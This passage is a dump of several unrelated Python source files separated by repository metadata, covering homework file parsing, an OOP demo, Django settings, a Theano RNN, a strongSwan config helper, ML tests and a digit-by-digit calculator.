Function Name: findCuisine()
Parameters: filename (str), cuisine (str)
Returns: list of restaurants (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def findCuisine(filename, cuisine):
    """Return the names of all restaurants in *filename* whose cuisine line
    matches *cuisine* exactly.

    The file stores one restaurant per 4-line record:
    name, cuisine, category, blank line.
    """
    # 'with' guarantees the handle is closed even if reading raises
    # (the original leaked it on any exception before file.close()).
    with open(filename, 'r') as file:
        content = file.readlines()
    listOfRestaurants = []
    for i in range(len(content)):
        if content[i].strip() == cuisine:
            # The restaurant name is the line immediately above its cuisine.
            listOfRestaurants.append(content[i - 1].strip())
    return listOfRestaurants
"""
Function Name: restaurantFilter()
Parameters: filename (str)
Returns: dictionary that maps cuisine type (str)
to a list of restaurants of the same cuisine type (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def restaurantFilter(filename):
    """Map each cuisine type found in *filename* to the list of restaurant
    names of that cuisine, in first-seen order.

    The file stores one restaurant per 4-line record:
    name, cuisine, category, blank line.
    """
    # Fixes: the original never closed the file and shadowed the builtin 'dict'.
    with open(filename, 'r') as file:
        content = file.readlines()
    mapping = {}
    for i in range(0, len(content), 4):
        name = content[i].strip()
        cuisine = content[i + 1].strip()
        # setdefault preserves the original first-seen key ordering.
        mapping.setdefault(cuisine, []).append(name)
    return mapping
"""
Function Name: createDirectory()
Parameters: filename (str), output filename (str)
Returns: None (NoneType)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def createDirectory(filename, outputFilename):
    """Write a directory of the restaurants in *filename* to
    *outputFilename*, grouped into 'Fast Food' and 'Sit-down' sections,
    each section numbered from 1.  Returns None.

    Fix: the original never closed either file handle; 'with' guarantees it.
    """
    with open(filename, 'r') as readFile:
        content = readFile.readlines()
    fastfood = []
    sitdown = []
    for i in range(2, len(content), 4):
        restaurant = content[i - 2].strip()
        cuisine = content[i - 1].strip()
        group = content[i].strip()
        if group == 'Fast Food':
            fastfood.append(f'{len(fastfood) + 1}. {restaurant} - {cuisine}\n')
        else:
            sitdown.append(f'{len(sitdown) + 1}. {restaurant} - {cuisine}')
    with open(outputFilename, 'w') as writeFile:
        writeFile.write('Restaurant Directory\n')
        writeFile.write('Fast Food\n')
        writeFile.writelines(fastfood)
        writeFile.write('Sit-down\n')
        # Same as the original loop: newline between entries, none after the last.
        writeFile.write('\n'.join(sitdown))
"""
Function Name: extraHours()
Parameters: filename (str), hour (int)
Returns: list of (person, extra money) tuples (tuple)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def extraHours(filename, hour):
    """Return (name, overtime_pay) tuples for every employee in the CSV
    *filename* who worked more than *hour* hours.

    CSV columns: name, age, wage, year hired, hours worked (header skipped).
    Fix: the original never closed the file; 'with' guarantees it.
    """
    overtime = []
    with open(filename, 'r') as file:
        next(file)  # skip the header row
        for row in file:
            fields = row.strip().split(',')
            name = fields[0]
            wage = int(fields[2])
            hoursWorked = int(fields[4])
            if hoursWorked > hour:
                overtime.append((name, (hoursWorked - hour) * wage))
    return overtime
"""
Function Name: seniorStaffAverage()
Parameters: filename (str), year (int)
Returns: average age of senior staff members (float)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def seniorStaffAverage(filename, year):
    """Return the average age, rounded to 2 decimals, of employees hired
    strictly before *year*; 0.0 if no employee qualifies.

    CSV columns: name, age, wage, year hired, hours worked (header skipped).
    Fixes: the original never closed the file and raised ZeroDivisionError
    when no employee matched.
    """
    totalAge = 0
    employeeCount = 0
    with open(filename, 'r') as file:
        next(file)  # skip the header row
        for row in file:
            fields = row.strip().split(',')
            if int(fields[3]) < year:
                totalAge += int(fields[1])
                employeeCount += 1
    if employeeCount == 0:
        return 0.0
    return round(totalAge / employeeCount, 2)
"""
Function Name: ageDict()
Parameters: filename (str), list of age ranges represented by strings (list)
Returns: dictionary (dict) that maps each age range (str) to a list of employees (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def ageDict(filename, ageRangeList):
    """Map each age-range string ('LO-HI', inclusive) in *ageRangeList* to
    the list of employee names whose age falls in it.  Ranges that match
    nobody are omitted; an age in several overlapping ranges is listed in
    each (matching the original behavior).

    Fix: the original never closed the file; 'with' guarantees it.
    """
    buckets = {r: [] for r in ageRangeList}
    bounds = [tuple(int(b) for b in r.split('-')) for r in ageRangeList]
    with open(filename, 'r') as file:
        next(file)  # skip the header row
        for row in file:
            fields = row.strip().split(',')
            name, age = fields[0], int(fields[1])
            for (lo, hi), key in zip(bounds, ageRangeList):
                if lo <= age <= hi:
                    buckets[key].append(name)
    # Drop empty ranges while preserving the order of ageRangeList.
    return {key: names for key, names in buckets.items() if names}
# print(findCuisine('restaurants.txt', 'Mexican'))
# print(restaurantFilter('restaurants.txt'))
# print(createDirectory('restaurants.txt','output.txt'))
# print(extraHours('employees.csv', 40))
# print(seniorStaffAverage('employees.csv', 2019))
# rangeList = ["20-29", "30-39"]
# print(ageDict('employees.csv', rangeList))
# print(ageDict('employees.csv', ['0-18', '18-19']))
|
[
"sanjay.mamidipaka@gmail.com"
] |
sanjay.mamidipaka@gmail.com
|
8498795049bcc029a2c71a310a2525dd63063293
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_commoners.py
|
ba7756247f776e21069b78a695be616e5b343ce5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 230
|
py
|
# class header
class _COMMONERS():
def __init__(self,):
self.name = "COMMONERS"
self.definitions = commoner
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['commoner']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
da3148eda0d51e3d5d6c53ed95cca7d8fd467839
|
75ce5b7fee397fe4e67ed15a58f4cd42e0f8de9f
|
/PythonMasterclass/OOP/oop.py
|
8f9a4c844627350a4a88b461ec85cf8bb780bbce
|
[] |
no_license
|
lukbast/stuff
|
7fd03b7e035394802c307682a25621dfd667960b
|
160e1d77d1b592fac099b9c7139fb4e2f7f8dbbe
|
refs/heads/main
| 2023-08-06T21:39:55.334812
| 2021-09-23T17:37:47
| 2021-09-23T17:37:47
| 409,684,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
class Kettle(object):
    """A kettle with a make, a price and an on/off state.

    ``power_source`` is a class attribute shared by all instances until an
    instance (or the class itself) rebinds it.
    """

    power_source = 'electricity'

    def __init__(self, make, price):
        """Create a kettle of the given make and price, switched off."""
        self.make, self.price, self.on = make, price, False

    def turn_on(self):
        """Switch the kettle on."""
        self.on = True
# Demo: instance attributes vs the shared class attribute power_source.
philips = Kettle('Philips', 420)
kenwood = Kettle('Kenwood', 9.99)
kenwood.price = 666
print(kenwood.price)
kenwood.turn_on()
print(kenwood.on)
print('Kettle: {0.make}, for {0.price}, isOn: {0.on}'.format(kenwood))
# In Python you can add new attributes to an object on the fly:
kenwood.color = 'magenta'
print(kenwood.color)
# DUN DUN DUN
print(philips.power_source)
print(kenwood.power_source)
# Assigning on the instance creates an instance attribute that shadows
# the class attribute for kenwood only.
kenwood.power_source = 'hamsters'
print(kenwood.power_source)
print(philips.power_source)
# Rebinding on the class affects instances without their own shadow copy
# (philips), but not kenwood, which now has an instance attribute.
Kettle.power_source = 'Atomic'
print(kenwood.power_source)
print(philips.power_source)
|
[
"jaimperator99@gmail.com"
] |
jaimperator99@gmail.com
|
3e64394d796a026c719123cf7ef89bcb82365121
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.py
|
45c4a65ca1273ffe327210776740e7315636db7c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 370
|
py
|
from gPhoton.gAperture import gAperture
def main():
    """Extract the NUV light curve for sdB sdssj_120408.22+153609.7 with gPhoton.

    All photometry parameters (30 s bins, aperture radius, background annulus)
    are hard-coded; the result is written to the CSV path below.
    """
    gAperture(band="NUV", skypos=[181.03425,15.602694], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
ce9e81e2b51bb97642a79f8b467a2770571ede66
|
eea1be5dbac7fa10167eae167eb6712e3937f53a
|
/voidcoin/settings/dev.py
|
70ec86d6e913a5df701dd36881e48c14a73f0cf7
|
[] |
no_license
|
chidimo/Voidcoin
|
40962e46661b2a7106bd8e60d0830c3b9629b8fa
|
227c160dfa671818522781aab013f2d1fcb098a9
|
refs/heads/develop
| 2022-12-09T17:40:26.294425
| 2019-07-04T08:32:20
| 2019-07-04T08:32:20
| 135,197,447
| 5
| 2
| null | 2022-12-08T02:08:45
| 2018-05-28T18:45:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,964
|
py
|
from .base import *
# Development-only overrides layered on top of .base settings.
DEBUG = True
# Local PostgreSQL; config() reads the password from the environment
# (presumably python-decouple, imported via base — TODO confirm).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'voidcoin',
        'USER': 'postgres',
        'PASSWORD': config('DEV_DB_PASSWORD'),
        'HOST': 'localhost',
        'PORT': 5432
    }
}
# Print outgoing e-mail to the console instead of sending it.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# django-debug-toolbar is enabled only in this dev settings module.
INSTALLED_APPS += ['debug_toolbar']
DEBUG_TOOLBAR_PANELS = [
    'debug_toolbar.panels.versions.VersionsPanel',
    'debug_toolbar.panels.timer.TimerPanel',
    'debug_toolbar.panels.settings.SettingsPanel',
    'debug_toolbar.panels.headers.HeadersPanel',
    'debug_toolbar.panels.request.RequestPanel',
    'debug_toolbar.panels.sql.SQLPanel',
    'debug_toolbar.panels.staticfiles.StaticFilesPanel',
    'debug_toolbar.panels.templates.TemplatesPanel',
    'debug_toolbar.panels.cache.CachePanel',
    'debug_toolbar.panels.signals.SignalsPanel',
    'debug_toolbar.panels.logging.LoggingPanel',
    'debug_toolbar.panels.redirects.RedirectsPanel',
]
MIDDLEWARE += [
    'debug_toolbar.middleware.DebugToolbarMiddleware',
]
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'formatters': {
# 'verbose': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# 'simple': {
# 'format': '%(levelname)s %(message)s'
# },
# },
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'voidcoin_dev.log'),
# 'formatter': 'verbose'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['file'],
# 'propagate': True,
# 'level':'DEBUG',
# },
# 'MYAPP': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# },
# }
# }
|
[
"orjichidi95@gmail.com"
] |
orjichidi95@gmail.com
|
6066c82429a06cfc912a197d31d676903f1d208e
|
cd50ed5464a5397b4e5bafc36efebf88f14b2d8b
|
/models/rnn_theano.py
|
cd97581f15b5bc82263db599c4e65f8f297ca657
|
[] |
no_license
|
millatidy/hit400_lstm
|
cc6db62c68f18296e40a75395725a8112d4632e8
|
38bce32bd8bec5c20e373957526bfecf79a3a761
|
refs/heads/master
| 2021-06-18T01:20:17.006138
| 2017-05-09T01:44:24
| 2017-05-09T01:44:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,909
|
py
|
import numpy as np
import theano as theano
import theano.tensor as T
from utils import *
import operator
class RNN_THEANO:
    '''
    input_dim is the array size of the input data
    hidden_dim is the array size of the hidden input_dim
    output_dim is the array size of the output
    # input weights is array [input_dim,hidden_dim]
    # hidden weights is array [hidden_dim, hidden_dim]
    # output weights is array [hidden_dim, output_dim]
    '''
    def __init__(self, input_dim, hidden_dim, output_dim, bptt_truncate=4):
        # assign instance variables
        self.input_dim = input_dim
        self.hidden_dim = hidden_dim
        self.output_dim = output_dim
        self.bptt_truncate = bptt_truncate
        # randomly initialize network weights (scaled by 1/sqrt(fan-in))
        input_to_hidden_weights = np.random.uniform(-np.sqrt(1./input_dim), np.sqrt(1./input_dim), (hidden_dim, input_dim))
        hidden_to_hidden_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))
        hidden_to_output_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (output_dim, hidden_dim))
        # Theano: Create shared variables for the three weight matrices
        self.IH = theano.shared(name='IH', value=input_to_hidden_weights.astype(theano.config.floatX))
        self.HH = theano.shared(name='HH', value=hidden_to_hidden_weights.astype(theano.config.floatX))
        self.HO = theano.shared(name='HO', value=hidden_to_output_weights.astype(theano.config.floatX))
        # We store the compiled theano graph functions on the instance
        self.theano = {}
        self.__theano_build__()

    def __theano_build__(self):
        """Compile the symbolic forward pass, loss, gradients and SGD step."""
        IH, HH, HO = self.IH, self.HH, self.HO
        x = T.ivector('x')
        y = T.ivector('y')
        def forward_prop_step(x_t, h_t_prev, IH, HH, HO):
            # One recurrence step: new hidden state and softmax output.
            h_t = T.tanh(IH[:,x_t] + HH.dot(h_t_prev))
            o_t = T.nnet.softmax(HO.dot(h_t))
            return [o_t[0], h_t]
        [o,h], updates = theano.scan(
            forward_prop_step,
            sequences=x,
            outputs_info=[None, dict(initial=T.zeros(self.hidden_dim))],
            non_sequences=[IH, HH, HO],
            truncate_gradient=self.bptt_truncate,
            strict=True)
        prediction = T.argmax(o, axis=1)
        o_error = T.sum(T.nnet.categorical_crossentropy(o,y))
        # Gradients
        dIH = T.grad(o_error, IH)
        dHH = T.grad(o_error, HH)
        dHO = T.grad(o_error, HO)
        # Assign functions
        self.forward_propagation = theano.function([x], o)
        self.predict = theano.function([x], prediction)
        self.ce_error = theano.function([x,y], o_error)
        # BUGFIX: was [dIH, dHH, HO] -- returned the HO weight matrix itself
        # instead of its gradient dHO, breaking gradient checking.
        self.bptt = theano.function([x,y], [dIH, dHH, dHO])
        # SGD
        learning_rate = T.scalar('learning_rate')
        # BUGFIX: the HO update read 'self.HH - learning_rate * dHO', i.e. it
        # overwrote HO with a perturbed copy of HH; it must start from self.HO.
        self.sdg_step = theano.function([x,y,learning_rate], [],
                        updates=[(self.IH, self.IH - learning_rate * dIH),
                                (self.HH, self.HH - learning_rate * dHH),
                                (self.HO, self.HO - learning_rate * dHO)])

    def calculate_total_loss(self, X, Y):
        """Sum of cross-entropy losses over all (x, y) sequence pairs."""
        return np.sum([self.ce_error(x,y) for x,y in zip(X,Y)])

    def calculate_loss(self, X, Y):
        # Divide the total loss by the number of words for a per-word loss.
        num_words = np.sum([len(y) for y in Y])
        return self.calculate_total_loss(X,Y)/float(num_words)
def gradient_check_theano(model, x, y, h=0.001, error_threshold=0.01):
    """Numerically verify the backprop gradients of *model* on one (x, y) pair.

    Perturbs each weight by +/-h, compares the central-difference estimate
    with the analytic gradient from model.bptt, and reports any element whose
    relative error exceeds *error_threshold*.  (Python 2: print statements.)
    """
    # Overwrite the bptt attribute. We need to backpropagate all the way to get the correct gradient
    model.bptt_truncate = 1000
    # Calculate the gradients using backprop
    bptt_gradients = model.bptt(x, y)
    # List of all parameters we want to chec.
    # NOTE(review): these names ('U', 'V', 'W') do not match RNN_THEANO's
    # attributes ('IH', 'HH', 'HO') — attrgetter would raise; confirm which
    # model class this checker was written for.
    model_parameters = ['U', 'V', 'W']
    # Gradient check for each parameter
    for pidx, pname in enumerate(model_parameters):
        # Get the actual parameter value from the mode, e.g. model.W
        parameter_T = operator.attrgetter(pname)(model)
        parameter = parameter_T.get_value()
        print "Performing gradient check for parameter %s with size %d." % (pname, np.prod(parameter.shape))
        # Iterate over each element of the parameter matrix, e.g. (0,0), (0,1), ...
        it = np.nditer(parameter, flags=['multi_index'], op_flags=['readwrite'])
        while not it.finished:
            ix = it.multi_index
            # Save the original value so we can reset it later
            original_value = parameter[ix]
            # Estimate the gradient using (f(x+h) - f(x-h))/(2*h)
            parameter[ix] = original_value + h
            parameter_T.set_value(parameter)
            gradplus = model.calculate_total_loss([x],[y])
            parameter[ix] = original_value - h
            parameter_T.set_value(parameter)
            gradminus = model.calculate_total_loss([x],[y])
            estimated_gradient = (gradplus - gradminus)/(2*h)
            parameter[ix] = original_value
            parameter_T.set_value(parameter)
            # The gradient for this parameter calculated using backpropagation
            backprop_gradient = bptt_gradients[pidx][ix]
            # calculate The relative error: (|x - y|/(|x| + |y|))
            relative_error = np.abs(backprop_gradient - estimated_gradient)/(np.abs(backprop_gradient) + np.abs(estimated_gradient))
            # If the error is to large fail the gradient check
            if relative_error > error_threshold:
                print "Gradient Check ERROR: parameter=%s ix=%s" % (pname, ix)
                print "+h Loss: %f" % gradplus
                print "-h Loss: %f" % gradminus
                print "Estimated_gradient: %f" % estimated_gradient
                print "Backpropagation gradient: %f" % backprop_gradient
                print "Relative Error: %f" % relative_error
                return
            it.iternext()
        print "Gradient check for parameter %s passed." % (pname)
|
[
"tidymilla@gmail.com"
] |
tidymilla@gmail.com
|
f7563abdb8f484051174f08311f015a78de85abb
|
a01e7f87a0088965e2e0a02476d2df12a49a1a18
|
/package/vpntfi/build/lib/vpnmodule/lib/ipsec.py
|
ec9ef5f7c46a4f3932aa7db489e96b7baad3399c
|
[] |
no_license
|
gsrr/IFT_jerry
|
0456a8a1fb98f84ad5c26dc36bdf32e2d85c750c
|
4c2f6900dfd7ae7f6b3cc2150b1c1be236b4c95c
|
refs/heads/master
| 2020-04-04T05:30:10.544252
| 2019-08-22T09:12:03
| 2019-08-22T09:12:03
| 48,145,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
import sys
import os
import configLoader
import mcommon
def make_replace_func(src, dst):
    """Return a function(items) that copies *src* to *dst* line by line,
    replacing in each line the first placeholder key found in *items*
    with its value.  Lines are stripped and rewritten with '\n'."""
    def wrap_func(items):
        with open(src, "r") as fr:
            with open(dst, "w") as fw:
                for line in fr.readlines():
                    line = line.strip()
                    for key in items.keys():
                        if key in line:
                            # Only the first matching key is applied per line.
                            line = line.replace(key, items[key])
                            break
                    fw.write(line + "\n")
    return wrap_func
class IPSec:
    """Thin wrapper around a strongSwan ipsec.conf managed via configLoader.
    (Python 2: uses print statements.)"""
    def __init__(self, conf = "/etc/strongswan/ipsec.conf"):
        self.conf = conf
        # Load the pristine template (<conf>.default), not the live file.
        self.clobj = configLoader.ConfigIPSec(cfg=self.conf + ".default")
        self.clobj.load()
    def getcfg(self):
        # Debug helper: dump the loaded configuration dictionary.
        print self.clobj.cfg
    def _add(self, *paras):
        key = paras[0]
        value = paras[1]
        self.clobj.add(key, value)
    def _remove(self, *paras):
        key = paras[0]
        self.clobj.remove(key)
    def status(self):
        """Return strongswan's systemd active-state string."""
        cmd = "systemctl is-active strongswan"
        output = mcommon.call_cmdstr(cmd)[0]
        return output
    def replacePSK(self, *paras):
        """Regenerate ipsec.secrets from its template, substituting [PSK]."""
        src = "/etc/strongswan/ipsec.secrets.default"
        dst = "/etc/strongswan/ipsec.secrets"
        items = {'[PSK]' : paras[0]}
        func = make_replace_func(src, dst)
        func(items)
    def unload(self):
        # Write the (possibly modified) template back to the live conf path.
        self.clobj.unload(self.conf)
    def showconf(self):
        os.system("cat %s"%self.conf)
def decor_test(func):
    # Ad-hoc test decorator: ignores the wrapped function entirely and runs
    # a fixed load/dump/unload/show cycle instead.
    def wrap_func():
        obj = IPSec("/etc/strongswan/ipsec.conf")
        obj.getcfg()
        obj.unload()
        obj.showconf()
    return wrap_func
@decor_test
def test_ipsec(obj):
    pass
def main():
    # Dispatch: the first CLI argument names a function in this module.
    func=getattr(sys.modules[__name__], sys.argv[1])
    func()
if __name__ == "__main__":
    main()
|
[
"jerrycheng1128@gmail.com"
] |
jerrycheng1128@gmail.com
|
04a5ac227ff16d908d6ea9c43ed65181b56820de
|
46b432cd3557038c454601367b878f889c9b6a8f
|
/kiyuna/tutorial07/tutorial07.py
|
cd07ce259e448005ecafb1d76d2ccac03e4a9643
|
[] |
no_license
|
tmu-nlp/NLPtutorial2019
|
84ceec06568fd9d899a686658fb8851466133375
|
d77d199c50cd37d70e462209a7bfcd4dee9140a1
|
refs/heads/master
| 2020-05-14T13:34:05.336594
| 2019-09-25T02:25:41
| 2019-09-25T02:25:41
| 181,814,723
| 1
| 0
| null | 2019-08-01T18:53:54
| 2019-04-17T04:04:06
|
Python
|
UTF-8
|
Python
| false
| false
| 478
|
py
|
from train_nn import *
from test_nn import *
import subprocess
# Train a 1-hidden-layer (2-node) neural net for one epoch on the labeled titles.
train_path = '../../data/titles-en-train.labeled'
train_nn(train_path, layer_num=1, node_num=2, epoch_num=1, λ=0.1)
# Predict labels for the test words and write them to out.txt.
test_path = '../../data/titles-en-test.word'
out_path = './out.txt'
test_nn(test_path, out_path)
# Grade the predictions against the gold labels with the course script.
script_path = '../../script/grade-prediction.py'
ans_path = '../../data/titles-en-test.labeled'
subprocess.run(f'{script_path} {ans_path} {out_path}'.split())
''' RESULT
Accuracy = 92.915338%
'''
|
[
"kyuna.prog@gmail.com"
] |
kyuna.prog@gmail.com
|
54af5cd1a521f7e55d1fc43f8010b47de5507d7a
|
67325192c1e528a39d457f11e61b480d68826708
|
/mods/mcpython/Commands/paststructur.py
|
117c93e349a2e464fbdd360aea9102a06eae33c7
|
[
"MIT"
] |
permissive
|
vashistaarav1611/mcpython-a-minecraft-clone-in-python
|
5851b377b54fd2b28c106112c7b18f397b71ab50
|
c16cd66f319efdeec4130e1a43f5a857caf1ea13
|
refs/heads/master
| 2023-02-01T22:48:51.787106
| 2020-12-21T15:02:25
| 2020-12-21T15:02:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
# todo: remove
from . import Command
import structures
import globals as G
class paststructur(Command.Command):
    """Chat command that pastes a registered structure into the world.

    NOTE(review): the name looks like a typo for 'pastestructure'; kept for
    compatibility with existing chat usage.
    """
    @staticmethod
    def getHelp():
        return "/paststructur <name> <x> <y> <z>"
    @staticmethod
    def isCommand(line):
        # A line is this command iff its first token matches exactly.
        return line.split(" ")[0] == "/paststructur"
    @staticmethod
    def getSyntaxError(line, entity, position, chat): # TODO: add syntax-error system
        pass
    @staticmethod
    def parse(line, entity, position, chat):
        """Paste structure <name> at integer coordinates <x> <y> <z>."""
        sc = line.split(" ")
        name = sc[1]
        x, y, z = int(sc[2]), int(sc[3]), int(sc[4])
        structures.handler.structures[name].past(G.window.model, x, y, z)
Command.handler.register(paststructur)
|
[
"baulukas1301@googlemail.com"
] |
baulukas1301@googlemail.com
|
d86340a6767ed274ae880923b13b4c21609393f6
|
047fbc11cd389e56865034cf473807db8718d92e
|
/assignment_test.py
|
46933b2148fcdc536230cfb6950f6b105b7d6bba
|
[] |
no_license
|
SDSS-Computing-Studies/002b-basic-math-Sebastianmaudee
|
5c07d14dd2f13a6de8674d08c36f614defd1d84a
|
ae9826096b03ba4cf0d45fa27ec4acf9449570b7
|
refs/heads/master
| 2023-08-28T23:20:37.346270
| 2021-10-21T21:16:41
| 2021-10-21T21:16:41
| 406,925,526
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#! python3
import a1, a2, a3, a4, a5, a6
# One pytest case per assignment module; each module must define 'answer'.
def test1():
    assert a1.answer == 14
def test2():
    assert a2.answer == 3
def test3():
    assert a3.answer == 10
def test4():
    assert a4.answer == 2.5
def test5():
    assert a5.answer == 1
def test6():
    assert a6.answer == 25
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
ee9703daa5cc3632e67a2217d830eed7463293cf
|
48fab33def7dfaed44dbf0a2c5c148798a10c4c8
|
/test/onnx_converter_test/hugectr2onnx_wdl_test.py
|
7577b6ee48494f469b7d97b2915f797fb76344de
|
[
"Apache-2.0"
] |
permissive
|
js-ts/HugeCTR
|
787fa22e8643cbfe7c6b9dac4414a70eb37f322c
|
085b2e8ad2abaee5578e7bf43b8394d0b8473b58
|
refs/heads/master
| 2023-08-16T11:29:57.490236
| 2021-10-21T02:31:24
| 2021-10-21T02:31:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,851
|
py
|
#
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hugectr
from hugectr.inference import InferenceParams, CreateInferenceSession
import hugectr2onnx
import onnxruntime as ort
from utils import read_samples_for_wdl, compare_array_approx
import numpy as np
def hugectr2onnx_wdl_test(batch_size, num_batches, data_source, data_file, graph_config, dense_model, sparse_models, onnx_model_path, model_name):
hugectr2onnx.converter.convert(onnx_model_path, graph_config, dense_model, True, sparse_models)
label, dense, wide_data, deep_data = read_samples_for_wdl(data_file, batch_size*num_batches, slot_num = 27)
sess = ort.InferenceSession(onnx_model_path)
res = sess.run(output_names=[sess.get_outputs()[0].name],
input_feed={sess.get_inputs()[0].name: dense, sess.get_inputs()[1].name: wide_data, sess.get_inputs()[2].name: deep_data})
res = res[0].reshape(batch_size*num_batches,)
inference_params = InferenceParams(model_name = model_name,
max_batchsize = batch_size,
hit_rate_threshold = 0.6,
dense_model_file = dense_model,
sparse_model_files = sparse_models,
device_id = 0,
use_gpu_embedding_cache = True,
cache_size_percentage = 0.6,
i64_input_key = False)
inference_session = CreateInferenceSession(graph_config, inference_params)
predictions = inference_session.predict(num_batches, data_source, hugectr.DataReaderType_t.Norm, hugectr.Check_t.Sum)
compare_array_approx(res, predictions, model_name, 1e-3, 1e-2)
if __name__ == "__main__":
hugectr2onnx_wdl_test(64, 100, "./wdl_data/file_list_test.txt",
"./wdl_data/val/sparse_embedding0.data",
"/onnx_converter/graph_files/wdl.json",
"/onnx_converter/hugectr_models/wdl_dense_2000.model",
["/onnx_converter/hugectr_models/wdl0_sparse_2000.model",
"/onnx_converter/hugectr_models/wdl1_sparse_2000.model"],
"/onnx_converter/onnx_models/wdl.onnx",
"wdl")
|
[
"zehuanw@nvidia.com"
] |
zehuanw@nvidia.com
|
41d3c3423049d66be5d5a676da6f65fc11ccee96
|
3117852233ea6c2644e723587a7b28d6d6518d95
|
/Calculator_Gamma.py
|
56834b8c0142138f9ff1356056dec9729eb49cbb
|
[] |
no_license
|
harishravi121/Pythoncodes
|
d70059a3b7785d668a4b03f3ec85b0777b33706f
|
1d6d6ca0ed6348b6c5d07d27d24668fb567527ca
|
refs/heads/master
| 2023-07-07T11:58:03.741814
| 2023-07-01T08:01:56
| 2023-07-01T08:01:56
| 211,642,477
| 3
| 0
| null | 2020-01-13T06:45:25
| 2019-09-29T10:00:32
|
Python
|
UTF-8
|
Python
| false
| false
| 4,117
|
py
|
#The ALU has digital circuits for sum, subtraction, multiplication and comparision.
#The challenge here would be to write the code for division, square root, trignometric and other fuctions
#The following python code just needs python install of 30 MB
x='25'; #2 digit number
y='14'; #2 digit number
#Doing representation of two digit product
product=int(x[1])*int(y[1])+10*(int(x[0])*int(y[1])+int(x[1])*int(y[0]))+int(x[0])*int(y[0])*100
#Doing representation of digit sum and subtraction
add=int(x[1])+int(y[1])+10*(int(x[0])+int(y[0]))
sub=int(x[1])-int(y[1])+10*(int(x[0])-int(y[0]))
#Showing output,
print('Product of ',x,' and' ,y,' ', product)
print('Sum of',x,' and' ,y,' ',add)
print('Subtraction ',x,' and' ,y,' ',sub)
#Dividing x a two digit number by z a single digit number
z='3'# Single digit number
ha=1;# While loop flag
j=0; # Increasing the quotient in the loop until the product exceeds the divisor
while ha:
r=int(x[1])+10*int(x[0])-j*int(z[0]);
if(r<int(z[0])):
ha=0; #Setting the while loop flag to 0 to come out of the loop
j=j+1; #incrementing the quotient until it divides
j=j-1; # Reducing the quotient as we counted one past
#Getting the decimal point of the quotient
ha=1;
h=0;
while ha:
r2=r*10-h*int(z[0]);
if(r2<int(z[0])):
ha=0;
h=h+1;
h=h-1;
print('division of ',x,' and' ,z,' ',j,'.',h)
#Finding square root by subtracting successively the contribution from most significant digit.
sq='314';
ha=1;
a=0;
while ha:
luv=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a;
a=a+1;
if luv<0:
ha=0;
a=a-2;
ha=1;
b=0;
while ha:
luv2=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b;
b=b+1;
if luv2<0:
ha=0;
b=b-2;
ha=1;
c=0;
while ha:
